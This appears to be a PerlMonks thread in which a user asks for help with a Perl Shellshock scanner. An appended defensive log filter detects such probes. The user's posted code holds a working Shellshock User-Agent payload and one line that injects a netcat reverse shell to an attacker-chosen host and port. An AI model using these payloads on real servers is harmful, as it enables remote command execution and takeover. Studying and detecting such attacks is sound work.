
Raw HTTP Request / Response

by Ghosty (Novice)
on Aug 24, 2018 at 04:25 UTC
Ghosty has asked for the wisdom of the Perl Monks concerning the following question:

Well shit, so I'm doing a tool that checks a site for a dangerous HTTP response, as in shellshock attacks etc., but whenever I try to make it so I get a raw HTTP response it does get me the content but it doesn't goddamn show the rest of the content. Example of what I get:

    HTTP/1.1 200 OK
    Date: Fri, 24 Aug 2018 04:11:14 GMT
    Server: Apache/2.2.21 (Unix) DAV/2
    Last-Modified: Thu, 25 Sep 2014 09:56:50 GMT
    ETag: "1ebf-6a8-503e0d1bdfc80"
    Accept-Ranges: bytes
    Content-Length: 1704
    Connection: close
    Content-Type: text/html
    X-Pad: avoid browser bug

What I should get:

    HTTP/1.1 200 OK
    Date: Fri, 24 Aug 2018 03:42:08 GMT
    Server: Apache/2.2.21 (Unix) DAV/2
    PING ( 56 data bytes 64 bytes from seq=0 ttl=115 time=56.815 ms, seq=1 ttl=115 time=55.693 ms, seq=2 ttl=115 time=59.925 ms
    Connection: close
    Content-Type: text/plain
    Content-Length: 139

    --- ping statistics ---
    3 packets transmitted, 3 packets received, 0% packet loss
    round-trip min/avg/max = 55.693/57.477/59.925 ms

That user-agent, I used it to test if the server is vulnerable to shellshock and then alert the user, the thing is... I don't get what I'm supposed to get.... So how did I get the second one? I used BurpSuite and a tool that acts like an HTTP proxy etc... But yeah, can anyone please help me?

Replies are listed 'Best First'.
Re: Raw HTTP Request / Response
by roboticus (Chancellor) on Aug 24, 2018 at 04:31 UTC


    You're not showing any code, so I can't offer any suggestions. However, looking at the results you're offering: Why would you expect to see the results of a command-line ping in a raw HTTP Request/Response transaction? I'd only expect to see something like that if (a) the server was vulnerable, and (b) the payload was an evil ping command.


    When your only tool is a hammer, all problems look like your thumb.

      $ua = new LWP::UserAgent;
      $ua->agent("$Inject; nc $bip $bport -e /bin/sh'");
      $request = HTTP::Request->new('GET');
      $request->url($url);
      $response = $ua->request($request);
      $code = $response->code;
      $headers = $response->headers_as_string;
      $body = $response->content;

      I found that code, which works fine on Windows, and the problem is on Unix it doesn't follow the =~ thingy. OK, here:

      sub PingInject{
          $url = "$target";
          $ua = new LWP::UserAgent;
          $ua->agent("() { :;}; /bin/bash -c 'ping -c 3'");
          $ua->timeout(15);
          $request = HTTP::Request->new('GET');
          $request->url($url);
          $response = $ua->request($request);
          $code = $response->code;
          $headers = $response->headers_as_string;
          $body = $response->content;
          if($body =~ /--- ping statistics ---/){
              print "[+] Shellshock Ping Injection was injected successfully! (Vulnerable!) \n";
              $injectionFound = "yes";
              $InjectPoint = "() { :;}; /bin/bash -c 'ping -c 3'";
              $Inject = "() { :;}; /bin/bash -c 'ping -c 3";
              InjCorrect();
          } else {
              print "[-] Shellshock Ping Injection was not injected successfully! (Not Vulnerable!) \n";
          }
      }

      At the part where it says "=~ /--- ping statistics ---/", on Windows it does follow that statement, but not on Linux; it just says the else statement... So any ideas on how to fix that?

        So any ideas on how to fix that?

        You don't "fix" that - it's an arbitrary command injection which your Linux installation correctly prohibits.
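
Added example, not part of the thread: the server-side counterpart to the probe discussed above, a Perl filter that flags Apache combined-format log lines whose request line, Referer or User-Agent contains the bash function-definition prefix `() {` used in the posted User-Agent. Checking the request line and Referer goes beyond the User-Agent case in the thread; the sub name `find_shellshock_probes` and the sample log lines are constructed for illustration.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Shellshock payloads start with a bash function definition: "()" followed by
# optional whitespace and "{". Ordinary header values do not contain this.
my $FUNC_DEF = qr/\(\)\s*\{/;

# Apache "combined" format:
# host ident user [time] "request" status bytes "referer" "user-agent"
# Quoted fields may contain backslash-escaped quotes, so match \\. as a pair.
my $QUOTED   = qr/"((?:[^"\\]|\\.)*)"/;
my $COMBINED = qr/^(\S+) \S+ \S+ \[([^\]]+)\] $QUOTED (\d{3}) \S+ $QUOTED $QUOTED$/;

# Return one hashref per log line in which any logged client-controlled field
# carries the function-definition prefix. Lines that do not parse are skipped.
sub find_shellshock_probes {
    my @lines = @_;
    my @hits;
    for my $line (@lines) {
        chomp $line;
        my ($host, $time, $req, $status, $ref, $agent) = $line =~ $COMBINED
            or next;
        my %field = (request => $req, referer => $ref, 'user-agent' => $agent);
        my @where = grep { $field{$_} =~ $FUNC_DEF } sort keys %field;
        next unless @where;
        push @hits, { host => $host, time => $time, status => $status,
                      fields => \@where };
    }
    return @hits;
}

# Constructed sample lines (documentation-range addresses, not real traffic).
my @sample = split /\n/, <<'END';
192.0.2.10 - - [24/Aug/2018:04:11:14 +0000] "GET /index.html HTTP/1.1" 200 1704 "-" "Mozilla/5.0 (X11; Linux x86_64)"
198.51.100.7 - - [24/Aug/2018:04:12:01 +0000] "GET /cgi-bin/status HTTP/1.1" 200 139 "-" "() { :;}; /bin/bash -c 'ping -c 3'"
198.51.100.7 - - [24/Aug/2018:04:12:09 +0000] "GET /cgi-bin/status HTTP/1.1" 500 531 "() { :; }; echo probe" "curl/7.58.0"
END

for my $hit (find_shellshock_probes(@sample)) {
    printf "%s [%s] status=%s fields=%s\n",
        $hit->{host}, $hit->{time}, $hit->{status},
        join(',', @{ $hit->{fields} });
}
```

A hit shows that a probe was logged, not that bash on the server executed it; the status code alone does not settle that either. Headers that the combined format does not record, such as Cookie, are outside what this filter can see.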
